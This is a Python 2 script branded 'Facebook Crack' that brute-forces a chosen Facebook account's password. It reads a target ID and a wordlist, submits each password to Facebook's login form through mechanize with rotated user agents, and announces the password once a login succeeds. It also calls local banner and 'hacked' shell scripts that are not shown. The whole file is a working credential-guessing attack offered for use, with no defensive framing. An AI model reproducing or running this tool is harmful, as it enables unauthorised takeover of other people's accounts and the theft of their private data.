#!/usr/bin/env python
# -*- coding: UTF-8 -*-

import sys
import mechanize
import cookielib
import random
import os


os.system('clear')
os.system('bash .banner.sh')
email = str(raw_input("    \033[1;32m   ⚪▁Enter ID \033[1;35m : "))


passwordlist = str(raw_input("      \033[1;32m ⚫▁Enter list: \033[1;35m"))


login = 'https://www.facebook.com/login.php?login_attempt=1'


useragents = [('Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0','Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008071615 Fedora/3.0.1-1.fc9 Firefox/3.0.1')]

def main():
	global br
	br = mechanize.Browser()
	cj = cookielib.LWPCookieJar()
	br.set_handle_robots(False)
	br.set_handle_redirect(True)
	br.set_cookiejar(cj)
	br.set_handle_equiv(True)
	br.set_handle_referer(True)
	br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1)
	welcome()
	search()
	print("\033[1;31mPassword does not exist in the wordlist")

	
	
def brute(password):
	sys.stdout.write("\r\033[1;32m[\033[1;33m*\033[1;32m] Trying \033[1;36m.....\033[1;31m {}\n".format(password))
	sys.stdout.flush()
	br.addheaders = [('User-agent', random.choice(useragents))]
	site = br.open(login)
	br.select_form(nr = 0)
	br.form['email'] = email
	br.form['pass'] = password
	sub = br.submit()
	log = sub.geturl()
	if log != login and (not 'login_attempt' in log):
                        os.system('bash .hacked.sh')
			print("\n\n\033[1;32m[\033[1;33m+\033[1;32m]\033[1;36m Password Find = {}\033[1;32m".format(password))
			raw_input("\033[1;34mANY KEY to Exit....")
			sys.exit(1)

			
def search():
	global password
	passwords = open(passwordlist,"r")
	for password in passwords:
		password = password.replace("\n","")
		brute(password)

		
#welcome 
def welcome():
        os.system('clear')
	wel = """

  \033[1;32m      +=========================================+
        |.......... \033[1;34m  Facebook Crack \033[1;32m  ...........|
        +-----------------------------------------+
        |    \033[1;33m     #\033[1;31mAuthor\033[1;33m:\033[1;37m Muhammed Hanfy       \033[1;32m  | 
        |	     \033[1;33m  Version 1.0 \033[1;32m               |
 	|  \033[1;31m CrackeR FaceBook By ---} \033[1;37mJoker Masr \033[1;32m  |
        +=========================================+
        |.......... \033[1;34m Facebook Cracker\033[1;32m  ...........|
        +-----------------------------------------+\n\n
"""
	total = open(passwordlist,"r")
	total = total.readlines()
	print wel 
	print "\033[1;32m [*] Account to crack : {}\033[1;37m".format(email)
	print "\033[1;32m [*] Loaded :\033[1;37m" , len(total), "\033[1;32mpasswords"
	print "\033[1;32m [*] Cracking, please wait ...\n\n"

	
if __name__ == '__main__':
	main()


